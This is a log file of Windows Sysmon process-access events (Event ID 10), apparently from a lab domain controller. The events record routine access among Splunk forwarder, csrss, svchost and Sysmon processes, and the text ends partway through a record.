{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1768,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-0010807C0300}\r\nSourceProcessId: 4016\r\nSourceThreadId: 4020\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00103B7D0300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-0010807C0300}","SourceProcessId":"4016","SourceThreadId":"4020","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00103B7D0300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1769,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00103B7D0300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00103B7D0300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1770,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1771,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1772,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1773,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1774,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1775,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1776,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 